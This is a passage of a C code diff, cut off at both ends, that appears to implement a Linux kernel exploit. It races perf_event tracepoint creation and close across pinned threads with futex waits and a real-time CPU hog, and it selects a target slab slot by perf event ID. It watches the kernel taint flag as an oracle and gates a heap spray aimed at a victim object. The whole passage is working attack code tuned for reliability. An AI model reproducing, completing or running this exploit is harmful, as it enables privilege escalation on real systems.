info->si_code : -1); +} + +static const char *tp_futex_wait_state_string(int futex_ret, int futex_errno) +{ + if (futex_ret == 0) + return "wake_ok"; + if (futex_ret == -1 && futex_errno == EAGAIN) + return "eagain"; + if (futex_ret == -1 && futex_errno == ETIMEDOUT) + return "timedout"; + if (futex_ret == -1 && futex_errno == EINTR) + return "eintr"; + return "other"; +} + +static const char *tp_fail_reason_string(int reason) +{ + switch (reason) { + case TP_FAIL_NONE: + return "none"; + case TP_FAIL_WARN_MISS: + return "warn_miss"; + case TP_FAIL_ORACLE_NO_VICTIM: + return "oracle_no_victim"; + case TP_FAIL_ORACLE_BAD_INDEX: + return "oracle_bad_index"; + case TP_FAIL_FINAL_FAILED: + return "final_failed"; + default: + return "unknown"; + } +} + +static void tp_apply_profile_for_round(struct tp_run_cfg *cfg, int round) +{ + if (!cfg) + return; + + if (round <= 1) { + cfg->tries_per_round = TP_FIXED_TRIES_PER_ROUND; + cfg->warn_wake_predelay_ns = TP_FIXED_WARN_WAKE_PREDELAY_NS; + cfg->profile_name = "A"; + return; + } + + cfg->tries_per_round = TP_PROFILE_B_TRIES_PER_ROUND; + cfg->warn_wake_predelay_ns = TP_PROFILE_B_WARN_WAKE_PREDELAY_NS; + cfg->profile_name = "B"; +} + +static void tp_log_stage_summary(void) +{ + int warn_hit = __atomic_load_n(&tp_warn_hit, __ATOMIC_ACQUIRE); + int race_success = __atomic_load_n(&tp_race_success, __ATOMIC_ACQUIRE); + int oracle_hit = __atomic_load_n(&tp_oracle_hit, __ATOMIC_ACQUIRE); + int victim_idx = __atomic_load_n(&tp_victim_msg_idx, __ATOMIC_ACQUIRE); + int final_entered = __atomic_load_n(&tp_final_stage_entered, __ATOMIC_ACQUIRE); + int final_result = __atomic_load_n(&tp_final_result, __ATOMIC_ACQUIRE); + int fail_reason = __atomic_load_n(&tp_fail_reason, __ATOMIC_ACQUIRE); + + log_info("warn_hit=%d race_success=%d oracle_hit=%d victim_msg_idx=%d final_stage_entered=%d final_result=%d fail_reason=%s", + warn_hit, race_success, oracle_hit, victim_idx, final_entered, final_result, + tp_fail_reason_string(fail_reason)); +} + 
+/* + * Build the tracepoint filter string "(common_pid==-1N||...||common_pid>=0)" + * with `terms` leading comparisons (clamped to 8192), N being i % 10. + * Returns a calloc()ed, NUL-terminated string the caller must free(), or NULL + * when terms <= 0, allocation fails, or the expression would not fit in the buffer. + */ +static char *tp_build_filter_expr(int terms) +{ + size_t cap; + size_t off = 0; + char *expr; + int n; + + if (terms <= 0) + return NULL; + + if (terms > 8192) + terms = 8192; + + /* 28 bytes per term is a generous budget; each term formats to 17 characters. */ + cap = (size_t)terms * 28 + 64; + expr = (char *)calloc(1, cap); + if (!expr) + return NULL; + + n = snprintf(expr + off, cap - off, "("); + if (n < 0 || (size_t)n >= cap - off) + goto fail; + off += (size_t)n; + + for (int i = 0; i < terms; i++) { + n = snprintf(expr + off, cap - off, + "common_pid==-1%d||", i % 10); + /* Bail out before off can pass cap: cap - off is size_t and would wrap. */ + if (n < 0 || (size_t)n >= cap - off) + goto fail; + off += (size_t)n; + } + + n = snprintf(expr + off, cap - off, "common_pid>=0)"); + if (n < 0 || (size_t)n >= cap - off) + goto fail; + + return expr; + +fail: + free(expr); + return NULL; +} + +static int tp_create_target_event_common(int event_id, const char *filter_expr, + pid_t pid, int noisy) +{ + struct perf_event_attr pe; + int fd; + + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_TRACEPOINT; + pe.size = sizeof(pe); + pe.config = event_id; + pe.disabled = 1; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.remove_on_exec = 1; + pe.sigtrap = 1; + pe.sample_period = 1; + pe.sample_type = PERF_SAMPLE_IP; + + fd = (int)perf_event_open(&pe, pid, -1, -1, PERF_FLAG_FD_CLOEXEC); + if (fd < 0) { + if (noisy) + log_warn("[tp] perf_event_open failed: errno=%d (%s)", errno, strerror(errno)); + return -1; + } + + if (filter_expr) { + if (ioctl(fd, PERF_EVENT_IOC_SET_FILTER, filter_expr) != 0) { + if (noisy) + log_warn("[tp] PERF_EVENT_IOC_SET_FILTER failed: %s", strerror(errno)); + close(fd); + return -1; + } + } + + if (ioctl(fd, PERF_EVENT_IOC_ENABLE, 0) != 0) { + if (noisy) + log_warn("[tp] PERF_EVENT_IOC_ENABLE failed: %s", strerror(errno)); + close(fd); + return -1; + } + + return fd; +} + +static int tp_create_target_event(int event_id, const char *filter_expr, pid_t pid) +{ + return tp_create_target_event_common(event_id, filter_expr, pid, 1); +} + +static void tp_prime_event_allocator_best_effort(const struct tp_attempt_ctx *ctx) +{ + int fd; + + if (!ctx) + return; + + fd = tp_create_target_event_common(ctx->event_id, ctx->filter_expr, 0, 0); + if (fd < 0) + return; + + (void)ioctl(fd, 
PERF_EVENT_IOC_DISABLE, 0); + (void)syscall(SYS_close, fd); +} + +static int tp_disable_and_close_if_open_ret(volatile int *fdp) +{ + int fd = __atomic_exchange_n(fdp, -1, __ATOMIC_ACQ_REL); + + if (fd >= 0) { + (void)ioctl(fd, PERF_EVENT_IOC_DISABLE, 0); + (void)syscall(SYS_close, fd); + } + + return fd; +} + +static void tp_wait_target_slot_rcu(int wait_us) +{ + if (wait_us < 0) + wait_us = 0; + + /* Close->reuse relies on RCU progress; a short sleep after barrier is safer. */ + user_synchronize_rcu(); + if (wait_us > 0) + usleep((useconds_t)wait_us); + user_synchronize_rcu(); +} + +static int tp_prepare_target_slot_for_attempt(int slot_idx, int rcu_wait_us) +{ + int old_fd; + + if (slot_idx < 0 || slot_idx >= TOTAL_OBJS) + return -1; + + old_fd = total_fds[slot_idx]; + if (old_fd >= 0) { + (void)syscall(SYS_close, old_fd); + total_fds[slot_idx] = -1; + + if (target_perf_fd == old_fd) + target_perf_fd = -1; + } + + tp_wait_target_slot_rcu(rcu_wait_us); + return 0; +} + +static struct tp_sched_cfg tp_build_sched_cfg(int mode) +{ + struct tp_sched_cfg cfg; + + memset(&cfg, 0, sizeof(cfg)); + cfg.worker_cpu = 0; + cfg.closer_cpu = 1; + cfg.worker_policy = SCHED_OTHER; + cfg.worker_prio = 0; + cfg.closer_policy = SCHED_OTHER; + cfg.closer_prio = 0; + cfg.hog_policy = SCHED_FIFO; + cfg.hog_prio = 90; + + if (mode == 1) { + cfg.worker_cpu = 0; + cfg.closer_cpu = 1; + cfg.closer_policy = SCHED_FIFO; + cfg.closer_prio = 70; + } else if (mode == 2) { + cfg.worker_cpu = 0; + cfg.closer_cpu = 0; + cfg.worker_policy = SCHED_FIFO; + cfg.worker_prio = 70; + cfg.closer_policy = SCHED_FIFO; + cfg.closer_prio = 60; + } + + return cfg; +} + +static void *tp_attempt_worker_thread(void *arg) +{ + struct tp_attempt_ctx *ctx = (struct tp_attempt_ctx *)arg; + struct timespec timeout; + int fd; + + tp_set_thread_affinity(ctx->sched.worker_cpu); + tp_set_thread_sched_best_effort("worker", ctx->sched.worker_policy, + ctx->sched.worker_prio, ctx->verbose); + + tp_futex_word = 0; + + if 
(ctx->do_prime) + tp_prime_event_allocator_best_effort(ctx); + + fd = tp_create_target_event(ctx->event_id, ctx->filter_expr, 0); + if (fd < 0) { + __atomic_store_n(&ctx->event_failed, 1, __ATOMIC_RELEASE); + __atomic_store_n(&ctx->start_close, 1, __ATOMIC_RELEASE); + return NULL; + } + + if (ctx->target_slot_idx >= 0 && ctx->target_slot_idx < TOTAL_OBJS) { + total_fds[ctx->target_slot_idx] = fd; + target_perf_fd = fd; + (void)ioctl(fd, PERF_EVENT_IOC_ID, &target_perf_id); + } + + __atomic_store_n(&tp_perf_fd, fd, __ATOMIC_RELEASE); + __atomic_store_n(&ctx->event_ready, 1, __ATOMIC_RELEASE); + + while (!__atomic_load_n(&ctx->closer_ready, __ATOMIC_ACQUIRE)) + tp_cpu_relax_once(); + if (ctx->hog_ns > 0) { + while (!__atomic_load_n(&ctx->hog_ready, __ATOMIC_ACQUIRE)) + tp_cpu_relax_once(); + } + + ctx->t_worker_write_ns = get_time_ns(); + __atomic_store_n(&ctx->start_close, 1, __ATOMIC_RELEASE); + + timeout.tv_sec = ctx->futex_timeout_ms / 1000; + timeout.tv_nsec = (ctx->futex_timeout_ms % 1000) * 1000000L; + + ctx->sigtrap_before_wait = (int)__atomic_load_n(&tp_sigtrap_count, __ATOMIC_ACQUIRE); + ctx->t_before_futex_wait_ns = get_time_ns(); + __atomic_store_n(&ctx->wait_armed, 1, __ATOMIC_RELEASE); + + errno = 0; + ctx->futex_ret = (int)do_futex(&tp_futex_word, FUTEX_WAIT, 0, &timeout, NULL, 0); + ctx->futex_errno = errno; + + ctx->t_after_futex_wait_ns = get_time_ns(); + ctx->sigtrap_after_wait = (int)__atomic_load_n(&tp_sigtrap_count, __ATOMIC_ACQUIRE); + ctx->t_last_sigtrap_ns = __atomic_load_n(&tp_last_sigtrap_ns, __ATOMIC_ACQUIRE); + + return NULL; +} + +static void *tp_attempt_closer_thread(void *arg) +{ + struct tp_attempt_ctx *ctx = (struct tp_attempt_ctx *)arg; + + tp_set_thread_affinity(ctx->sched.closer_cpu); + tp_set_thread_sched_best_effort("closer", ctx->sched.closer_policy, + ctx->sched.closer_prio, ctx->verbose); + + __atomic_store_n(&ctx->closer_ready, 1, __ATOMIC_RELEASE); + + while (!__atomic_load_n(&ctx->event_ready, __ATOMIC_ACQUIRE) && + 
!__atomic_load_n(&ctx->event_failed, __ATOMIC_ACQUIRE)) + tp_cpu_relax_once(); + + if (__atomic_load_n(&ctx->event_failed, __ATOMIC_ACQUIRE)) + return NULL; + + while (!__atomic_load_n(&ctx->start_close, __ATOMIC_ACQUIRE)) + tp_cpu_relax_once(); + + tp_spin_delay_ns((uint64_t)ctx->delay_ns); + + ctx->t_closer_close_ns = get_time_ns(); + { + int closed_fd = tp_disable_and_close_if_open_ret(&tp_perf_fd); + + if (ctx->target_slot_idx >= 0 && ctx->target_slot_idx < TOTAL_OBJS) { + if (total_fds[ctx->target_slot_idx] == closed_fd) + total_fds[ctx->target_slot_idx] = -1; + if (target_perf_fd == closed_fd) + target_perf_fd = -1; + } + } + + for (int spins = 0; spins < TP_FIXED_WAKE_ARM_SPINS; spins++) { + if (__atomic_load_n(&ctx->wait_armed, __ATOMIC_ACQUIRE)) + break; + tp_cpu_relax_once(); + } + + if (TP_FIXED_POST_CLOSE_GRACE_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_POST_CLOSE_GRACE_NS); + + if (TP_FIXED_WAKE_DELAY_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_WAKE_DELAY_NS); + + { + long tainted_now = -1; + uint64_t poll_start = get_time_ns(); + int poll_reads = 0; + + while (1) { + poll_reads++; + if (tp_read_kernel_tainted(&tainted_now) == 0 && + tp_taint_warn_bit_set(tainted_now)) + break; + + if ((get_time_ns() - poll_start) >= TP_FIXED_PREWAKE_TAINT_POLL_MAX_NS) + break; + + if (TP_FIXED_PREWAKE_TAINT_POLL_STEP_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_PREWAKE_TAINT_POLL_STEP_NS); + else + tp_cpu_relax_once(); + } + + ctx->taint_poll_reads = poll_reads; + ctx->taint_poll_ns = get_time_ns() - poll_start; + + if (tp_taint_warn_bit_set(tainted_now)) { + uint64_t hold_start = get_time_ns(); + + ctx->warn_seen_pre_wake = 1; + ctx->warn_seen_stage = 1; + if (!ctx->first_warn_detect_ns) + ctx->first_warn_detect_ns = hold_start; + tp_warn_open_gate_and_wait_spray(ctx, hold_start); + + ctx->warn_hold_ns = get_time_ns() - hold_start; + } + } + + tp_maybe_apply_warn_wake_hold(ctx); + + /* + * Try wake without flipping futex word first: this avoids forcing EAGAIN + 
* when waiter is about to enter FUTEX_WAIT but not queued yet. + */ + ctx->t_wake_ns = get_time_ns(); + if (ctx->first_warn_detect_ns > 0 && ctx->t_wake_ns >= ctx->first_warn_detect_ns) + ctx->warn_detect_to_first_wake_ns = ctx->t_wake_ns - ctx->first_warn_detect_ns; + errno = 0; + ctx->wake_ret = (int)do_futex(&tp_futex_word, FUTEX_WAKE, 1, NULL, NULL, 0); + ctx->wake_errno = errno; + ctx->wake_final_ret = ctx->wake_ret; + ctx->wake_final_errno = ctx->wake_errno; + ctx->wake_calls = 1; + if (ctx->wake_ret > 0) + ctx->wake_hit_total = ctx->wake_ret; + + for (int retry = 0; + retry < TP_FIXED_WAKE_RETRY_COUNT && ctx->wake_final_ret <= 0; + retry++) { + if (TP_FIXED_WAKE_RETRY_GAP_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_WAKE_RETRY_GAP_NS); + + errno = 0; + ctx->wake_final_ret = (int)do_futex(&tp_futex_word, FUTEX_WAKE, 1, NULL, NULL, 0); + ctx->wake_final_errno = errno; + ctx->wake_calls++; + if (ctx->wake_final_ret > 0) + ctx->wake_hit_total += ctx->wake_final_ret; + } + + if (ctx->wake_final_ret <= 0 && TP_FIXED_LATE_WAKE_GRACE_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_LATE_WAKE_GRACE_NS); + + if (ctx->wake_final_ret <= 0) { + errno = 0; + ctx->wake_final_ret = (int)do_futex(&tp_futex_word, FUTEX_WAKE, 1, NULL, NULL, 0); + ctx->wake_final_errno = errno; + ctx->wake_calls++; + if (ctx->wake_final_ret > 0) + ctx->wake_hit_total += ctx->wake_final_ret; + } + + if (ctx->wake_final_ret <= 0) { + int warn_late = ctx->warn_seen_pre_wake; + long tainted_late = -1; + uint64_t late_poll_start = get_time_ns(); + + while (!warn_late) { + ctx->late_taint_poll_reads++; + if (tp_read_kernel_tainted(&tainted_late) == 0 && + tp_taint_warn_bit_set(tainted_late)) { + warn_late = 1; + break; + } + + if ((get_time_ns() - late_poll_start) >= TP_FIXED_LATE_TAINT_POLL_MAX_NS) + break; + + if (TP_FIXED_LATE_TAINT_POLL_STEP_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_LATE_TAINT_POLL_STEP_NS); + else + tp_cpu_relax_once(); + } + + if (warn_late) { + ctx->warn_seen_pre_wake = 1; + 
if (!ctx->warn_seen_stage) + ctx->warn_seen_stage = 2; + } else { + ctx->warn_seen_stage = 3; + } + + { + uint64_t hold_start = get_time_ns(); + + if (!ctx->first_warn_detect_ns) + ctx->first_warn_detect_ns = hold_start; + tp_warn_open_gate_and_wait_spray(ctx, hold_start); + if (!ctx->warn_hold_ns || ctx->warn_hold_ns < (get_time_ns() - hold_start)) + ctx->warn_hold_ns = get_time_ns() - hold_start; + tp_maybe_apply_warn_wake_hold(ctx); + + uint64_t extend_start = get_time_ns(); + while (ctx->wake_final_ret <= 0 && + (get_time_ns() - extend_start) < TP_FIXED_WARN_WAKE_EXTEND_MAX_NS) { + if (TP_FIXED_WARN_WAKE_EXTEND_GAP_NS > 0) + tp_spin_delay_ns((uint64_t)TP_FIXED_WARN_WAKE_EXTEND_GAP_NS); + else + tp_cpu_relax_once(); + + errno = 0; + ctx->wake_final_ret = (int)do_futex(&tp_futex_word, FUTEX_WAKE, 1, NULL, NULL, 0); + ctx->wake_final_errno = errno; + ctx->wake_calls++; + if (ctx->wake_final_ret > 0) + ctx->wake_hit_total += ctx->wake_final_ret; + } + } + } + + if (ctx->wake_final_ret <= 0) { + __atomic_store_n(&tp_futex_word, 1, __ATOMIC_RELEASE); + ctx->wake_store1_fallback = 1; + errno = 0; + ctx->wake_final_ret = (int)do_futex(&tp_futex_word, FUTEX_WAKE, 1, NULL, NULL, 0); + ctx->wake_final_errno = errno; + ctx->wake_calls++; + if (ctx->wake_final_ret > 0) + ctx->wake_hit_total += ctx->wake_final_ret; + } + + return NULL; +} + +static void *tp_attempt_hog_thread(void *arg) +{ + struct tp_attempt_ctx *ctx = (struct tp_attempt_ctx *)arg; + + tp_set_thread_affinity(ctx->sched.worker_cpu); + tp_set_thread_sched_best_effort("hog", ctx->sched.hog_policy, + ctx->sched.hog_prio, ctx->verbose); + + __atomic_store_n(&ctx->hog_ready, 1, __ATOMIC_RELEASE); + while (!__atomic_load_n(&ctx->start_close, __ATOMIC_ACQUIRE)) + tp_cpu_relax_once(); + + tp_spin_delay_ns((uint64_t)ctx->hog_ns); + return NULL; +} + +static int tp_run_one_attempt(const struct tp_run_cfg *cfg, + const char *filter_expr, + int *sigtrap_delta, + int64_t *close_minus_write_ns, + int *futex_ret_out, + int 
*futex_errno_out, + int *postwait_sigtrap_out, + int64_t *sigtrap_after_wait_ns_out, + int *wake_ret_out, + int *wake_errno_out, + int *wake_final_ret_out, + int *wake_final_errno_out, + int *wake_calls_out, + int *wake_hit_total_out, + int *wake_store1_fallback_out, + int *wake_warn_extend_used_out, + int64_t *wake_warn_extend_ns_out, + int *late_taint_poll_reads_out, + int64_t *futex_wait_ns_out, + int64_t *wake_to_futex_return_ns_out, + int64_t *wake_to_sigtrap_ns_out, + int *sigtrap_timing_out, + int *warn_seen_pre_wake_out, + int *warn_seen_stage_out, + int64_t *warn_hold_ns_out, + int64_t *warn_wake_predelay_ns_out, + int *warn_hold_applied_out, + int64_t *warn_hold_applied_ns_out, + int64_t *warn_detect_to_first_wake_ns_out, + int *spray_seen_pre_wake_out, + int *spray_gate_opened_out, + int *taint_poll_reads_out, + int64_t *taint_poll_ns_out, + int target_slot_idx) +{ + struct tp_attempt_ctx ctx; + pthread_t worker; + pthread_t closer; + pthread_t hog; + int hog_started = 0; + int sigtrap_start; + int sigtrap_end; + + memset(&ctx, 0, sizeof(ctx)); + ctx.delay_ns = cfg->delay_ns; + ctx.hog_ns = cfg->hog_ns; + ctx.futex_timeout_ms = cfg->futex_timeout_ms; + ctx.event_id = cfg->event_id; + ctx.filter_expr = filter_expr; + ctx.sched = tp_build_sched_cfg(cfg->mode); + ctx.warn_wake_predelay_target_ns = cfg->warn_wake_predelay_ns; + ctx.verbose = cfg->verbose; + ctx.do_prime = 0; + ctx.target_slot_idx = target_slot_idx; + ctx.futex_ret = -2; + ctx.futex_errno = 0; + ctx.wake_ret = -2; + ctx.wake_errno = 0; + ctx.wake_final_ret = -2; + ctx.wake_final_errno = 0; + ctx.wake_calls = 0; + ctx.wake_hit_total = 0; + ctx.wake_store1_fallback = 0; + ctx.wake_warn_extend_used = 0; + ctx.wake_warn_extend_ns = 0; + ctx.late_taint_poll_reads = 0; + + if (ctx.target_slot_idx < 0 || ctx.target_slot_idx >= TOTAL_OBJS) + return -6; + + __atomic_store_n(&tp_perf_fd, -1, __ATOMIC_RELEASE); + sigtrap_start = (int)__atomic_load_n(&tp_sigtrap_count, __ATOMIC_ACQUIRE); + + if 
(ctx.hog_ns > 0) { + if (pthread_create(&hog, NULL, tp_attempt_hog_thread, &ctx) != 0) + return -5; + hog_started = 1; + } + + if (pthread_create(&closer, NULL, tp_attempt_closer_thread, &ctx) != 0) { + if (hog_started) { + pthread_cancel(hog); + pthread_join(hog, NULL); + } + return -4; + } + + if (pthread_create(&worker, NULL, tp_attempt_worker_thread, &ctx) != 0) { + pthread_cancel(closer); + pthread_join(closer, NULL); + if (hog_started) { + pthread_cancel(hog); + pthread_join(hog, NULL); + } + return -3; + } + + pthread_join(worker, NULL); + pthread_join(closer, NULL); + if (hog_started) + pthread_join(hog, NULL); + + { + int cleanup_fd = tp_disable_and_close_if_open_ret(&tp_perf_fd); + + if (cleanup_fd >= 0) { + if (total_fds[ctx.target_slot_idx] == cleanup_fd) + total_fds[ctx.target_slot_idx] = -1; + if (target_perf_fd == cleanup_fd) + target_perf_fd = -1; + } + } + + if (ctx.event_failed) + return -2; + + sigtrap_end = (int)__atomic_load_n(&tp_sigtrap_count, __ATOMIC_ACQUIRE); + + if (sigtrap_delta) + *sigtrap_delta = sigtrap_end - sigtrap_start; + + if (close_minus_write_ns) { + if (ctx.t_closer_close_ns && ctx.t_worker_write_ns) + *close_minus_write_ns = + (int64_t)(ctx.t_closer_close_ns - ctx.t_worker_write_ns); + else + *close_minus_write_ns = 0; + } + + if (futex_ret_out) + *futex_ret_out = ctx.futex_ret; + if (futex_errno_out) + *futex_errno_out = ctx.futex_errno; + if (postwait_sigtrap_out) { + int d = ctx.sigtrap_after_wait - ctx.sigtrap_before_wait; + *postwait_sigtrap_out = d > 0 ? 
d : 0; + } + if (sigtrap_after_wait_ns_out) { + int64_t d = -1; + + if (ctx.sigtrap_after_wait > ctx.sigtrap_before_wait && + ctx.t_last_sigtrap_ns >= ctx.t_before_futex_wait_ns) + d = (int64_t)(ctx.t_last_sigtrap_ns - ctx.t_before_futex_wait_ns); + *sigtrap_after_wait_ns_out = d; + } + if (wake_ret_out) + *wake_ret_out = ctx.wake_ret; + if (wake_errno_out) + *wake_errno_out = ctx.wake_errno; + if (wake_final_ret_out) + *wake_final_ret_out = ctx.wake_final_ret; + if (wake_final_errno_out) + *wake_final_errno_out = ctx.wake_final_errno; + if (wake_calls_out) + *wake_calls_out = ctx.wake_calls; + if (wake_hit_total_out) + *wake_hit_total_out = ctx.wake_hit_total; + if (wake_store1_fallback_out) + *wake_store1_fallback_out = ctx.wake_store1_fallback; + if (wake_warn_extend_used_out) + *wake_warn_extend_used_out = ctx.wake_warn_extend_used; + if (wake_warn_extend_ns_out) + *wake_warn_extend_ns_out = (int64_t)ctx.wake_warn_extend_ns; + if (late_taint_poll_reads_out) + *late_taint_poll_reads_out = ctx.late_taint_poll_reads; + + if (futex_wait_ns_out) { + int64_t d = -1; + + if (ctx.t_after_futex_wait_ns >= ctx.t_before_futex_wait_ns) + d = (int64_t)(ctx.t_after_futex_wait_ns - ctx.t_before_futex_wait_ns); + *futex_wait_ns_out = d; + } + + if (wake_to_futex_return_ns_out) { + int64_t d = -1; + + if (ctx.t_wake_ns > 0 && ctx.t_after_futex_wait_ns >= ctx.t_wake_ns) + d = (int64_t)(ctx.t_after_futex_wait_ns - ctx.t_wake_ns); + *wake_to_futex_return_ns_out = d; + } + + if (wake_to_sigtrap_ns_out) { + int64_t d = -1; + + if (ctx.sigtrap_after_wait > ctx.sigtrap_before_wait && + ctx.t_wake_ns > 0 && + ctx.t_last_sigtrap_ns >= ctx.t_wake_ns) + d = (int64_t)(ctx.t_last_sigtrap_ns - ctx.t_wake_ns); + *wake_to_sigtrap_ns_out = d; + } + + if (sigtrap_timing_out) { + int timing = -1; + + if (ctx.sigtrap_after_wait > ctx.sigtrap_before_wait) { + if (ctx.t_last_sigtrap_ns >= ctx.t_before_futex_wait_ns && + ctx.t_last_sigtrap_ns <= ctx.t_after_futex_wait_ns) + timing = 0; + else if 
(ctx.t_last_sigtrap_ns > ctx.t_after_futex_wait_ns) + timing = 1; + } + *sigtrap_timing_out = timing; + } + + if (warn_seen_pre_wake_out) + *warn_seen_pre_wake_out = ctx.warn_seen_pre_wake; + if (warn_seen_stage_out) + *warn_seen_stage_out = ctx.warn_seen_stage; + if (warn_hold_ns_out) + *warn_hold_ns_out = (int64_t)ctx.warn_hold_ns; + if (warn_wake_predelay_ns_out) + *warn_wake_predelay_ns_out = (int64_t)ctx.warn_wake_predelay_ns; + if (warn_hold_applied_out) + *warn_hold_applied_out = ctx.warn_hold_applied; + if (warn_hold_applied_ns_out) + *warn_hold_applied_ns_out = (int64_t)ctx.warn_hold_applied_ns; + if (warn_detect_to_first_wake_ns_out) { + int64_t d = -1; + + if (ctx.first_warn_detect_ns > 0 && ctx.warn_detect_to_first_wake_ns > 0) + d = (int64_t)ctx.warn_detect_to_first_wake_ns; + *warn_detect_to_first_wake_ns_out = d; + } + if (spray_seen_pre_wake_out) + *spray_seen_pre_wake_out = ctx.spray_seen_pre_wake; + if (spray_gate_opened_out) + *spray_gate_opened_out = ctx.spray_gate_opened; + if (taint_poll_reads_out) + *taint_poll_reads_out = ctx.taint_poll_reads; + if (taint_poll_ns_out) + *taint_poll_ns_out = (int64_t)ctx.taint_poll_ns; + + return 0; +} + +void *tp_worker_thread(void *arg) +{ + (void)arg; + struct perf_event_attr pe; + struct sigaction sa; + struct tp_run_cfg cfg; + char *filter_expr = NULL; + uint64_t base_id = 0; + uint64_t target_id_wanted; + unsigned long attempt_seq = 0; + + tp_set_thread_affinity(0); + + memset(&sa, 0, sizeof(sa)); + sa.sa_sigaction = tp_sigtrap_handler; + sa.sa_flags = SA_SIGINFO; + sigemptyset(&sa.sa_mask); + if (sigaction(SIGTRAP, &sa, NULL) < 0) { + perror("sigaction(SIGTRAP)"); + __atomic_store_n(&tp_spray_gate, -1, __ATOMIC_RELEASE); + stop_threads = 1; + exit_threads = 1; + return NULL; + } + + memset(&cfg, 0, sizeof(cfg)); + cfg.event_id = TP_FIXED_EVENT_ID; + cfg.delay_ns = TP_FIXED_DELAY_NS; + cfg.tries_per_round = TP_FIXED_TRIES_PER_ROUND; + cfg.mode = TP_FIXED_MODE; + cfg.filter_terms = TP_FIXED_FILTER_TERMS; 
+ cfg.futex_timeout_ms = TP_FIXED_FUTEX_TIMEOUT_MS; + cfg.hog_ns = TP_FIXED_HOG_NS; + cfg.verbose = TP_FIXED_VERBOSE; + cfg.drain_every_attempts = TP_FIXED_DRAIN_EVERY; + cfg.drain_sleep_us = TP_FIXED_DRAIN_SLEEP_US; + cfg.prime_every_attempts = TP_FIXED_PRIME_EVERY; + cfg.warn_wake_predelay_ns = TP_FIXED_WARN_WAKE_PREDELAY_NS; + cfg.profile_name = "A"; + + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_TRACEPOINT; + pe.size = sizeof(pe); + pe.config = cfg.event_id; + pe.disabled = 1; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.sigtrap = 1; + pe.remove_on_exec = 1; + pe.sample_period = 1; + pe.sample_type = PERF_SAMPLE_IP; + + for (int i = 0; i < DRAIN_COUNT; i++) { + drain_fds[i] = perf_event_open(&pe, 0, -1, -1, PERF_FLAG_FD_CLOEXEC); + if (i == 0 && drain_fds[0] != -1) + (void)ioctl(drain_fds[0], PERF_EVENT_IOC_ID, &base_id); + } + + log_dbg("Config: Objs/Slab=%d, Target Slabs=%d, Base ID=%lu", + OBJS_PER_SLAB, TOTAL_OBJS / OBJS_PER_SLAB, base_id); + + for (int i = 0; i < TOTAL_OBJS; i++) { + total_fds[i] = perf_event_open(&pe, 0, -1, -1, PERF_FLAG_FD_CLOEXEC); + if (total_fds[i] == -1) + perror("perf_event_open"); + } + + target_id_wanted = base_id + DRAIN_COUNT + ((PADDINGS + 1) * OBJS_PER_SLAB) + 2; + + for (int i = 0; i < TOTAL_OBJS; i++) { + uint64_t id; + + if (total_fds[i] == -1) + continue; + (void)ioctl(total_fds[i], PERF_EVENT_IOC_ID, &id); + if (id == target_id_wanted) { + target_perf_id = id; + target_perf_fd = total_fds[i]; /* layout target: must stay tied to total_fds */ + perf_fd_idx = i; + break; + } + } + + if (target_perf_fd == -1 || perf_fd_idx < 0) { + log_warn("Could not find layout target perf event id=%lu", target_id_wanted); + __atomic_store_n(&tp_spray_gate, -1, __ATOMIC_RELEASE); + stop_threads = 1; + exit_threads = 1; + return NULL; + } + + log_info("layout target selected: idx=%d fd=%d id=%lu", + perf_fd_idx, target_perf_fd, target_perf_id); + + filter_expr = tp_build_filter_expr(cfg.filter_terms); + if (!filter_expr) { + 
log_warn("failed to build filter expr"); + __atomic_store_n(&tp_spray_gate, -1, __ATOMIC_RELEASE); + stop_threads = 1; + exit_threads = 1; + return NULL; + } + + log_info("race profile base: event=%d mode=%d filter=%d futex_to_ms=%d hog_ns=%d tries{A=%d,B=%d} warn_predelay_ns{A=%d,B=%d}", + cfg.event_id, cfg.mode, cfg.filter_terms, cfg.futex_timeout_ms, cfg.hog_ns, + TP_FIXED_TRIES_PER_ROUND, TP_PROFILE_B_TRIES_PER_ROUND, + TP_FIXED_WARN_WAKE_PREDELAY_NS, TP_PROFILE_B_WARN_WAKE_PREDELAY_NS); + log_info("wake staging: post_close_grace_ns=%d wake_delay_ns=%d wake_retry{count=%d,gap_ns=%d} late_wake_grace_ns=%d taint_poll{max_ns=%d,step_ns=%d} late_taint_poll{max_ns=%d,step_ns=%d} warn_extend{max_ns=%d,gap_ns=%d}", + TP_FIXED_POST_CLOSE_GRACE_NS, TP_FIXED_WAKE_DELAY_NS, + TP_FIXED_WAKE_RETRY_COUNT, TP_FIXED_WAKE_RETRY_GAP_NS, + TP_FIXED_LATE_WAKE_GRACE_NS, + TP_FIXED_PREWAKE_TAINT_POLL_MAX_NS, TP_FIXED_PREWAKE_TAINT_POLL_STEP_NS, + TP_FIXED_LATE_TAINT_POLL_MAX_NS, TP_FIXED_LATE_TAINT_POLL_STEP_NS, + TP_FIXED_WARN_WAKE_EXTEND_MAX_NS, TP_FIXED_WARN_WAKE_EXTEND_GAP_NS); + log_info("spray timing: gate_release_delay_ns=%llu phaseA=%d phaseB_base_ns=%d phaseB_step_ns=%d phaseB_steps=%d first_alloc_wait_ns=%llu done_wait_ns=%llu", + (unsigned long long)TP_GATE_RELEASE_DELAY_NS, + TP_SPRAY_PHASEA_COUNT, TP_SPRAY_PHASEB_BASE_DELAY_NS, + TP_SPRAY_PHASEB_STEP_NS, TP_SPRAY_PHASEB_STEPS, + (unsigned long long)TP_SPRAY_FIRST_ALLOC_WAIT_NS, + (unsigned long long)TP_SPRAY_DONE_WAIT_NS); + + for (int round = 1; round <= TP_MAX_ROUNDS; round++) { + tp_apply_profile_for_round(&cfg, round); + int round_hit = 0; + + log_info("race round %d/%d start profile=%s tries=%d warn_predelay_ns=%d", + round, TP_MAX_ROUNDS, cfg.profile_name, cfg.tries_per_round, + cfg.warn_wake_predelay_ns); + + for (int i = 1; i <= cfg.tries_per_round; i++) { + long taint_before = -1; + long taint_after = -1; + int taint_before_ok; + int taint_after_ok; + int before_warn; + int after_warn; + int hit; + int 
